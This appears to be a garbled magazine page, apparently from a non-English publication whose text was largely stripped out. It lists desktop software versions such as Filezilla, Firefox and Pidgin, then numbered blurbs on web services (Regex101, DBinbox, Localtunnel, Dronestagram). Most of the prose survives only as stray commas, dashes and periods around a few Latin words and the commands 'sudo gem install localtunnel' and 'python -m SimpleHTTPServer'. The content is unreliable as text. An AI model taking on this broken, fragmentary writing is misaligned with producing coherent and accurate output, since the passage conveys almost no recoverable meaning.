Yubipam 1.1.0

Fbmsg 0.12
Filezilla 3.7.3
Firefox 23.0
Httraqt 1.1.1
Jftp 1.57
Midori 0.5.4
Modemmanager 1.0.0
Pcapfix 0.7.3
Pidgin 2.10.7
Pyaggr3g470r 4.1
Sflphone 1.2.3
Transmission 2.82
Xvideoservicethief 2.5


WWW 2.0
,

-

01
REGEX101 (regex101.com)
Regex101 .
.
,
. , ,
, . ,
,
.

03
DBINBOX (dbinbox.com)
DBinbox Dropbo.
. , -.
. ,
Dropbox,
. ,
. , -
-
. , (, )
( ).


LOCALTUNNEL (progrium.com/localtunnel)
Localtunnel gem Ruby,
-
. sudo gem install localtunnel, OS X
Console Tools Xcode.
http://xxx.localtunnel.com, ,
DynDNS . - python -m
SimpleHTTPServer
.

02
DRONESTAGRAM (www.dronestagr.am)
, Dronestagram
Instagram . ,

,
AR.Drone .
,

. ,
,
. ,
,
.

,
Dropbox
,

04
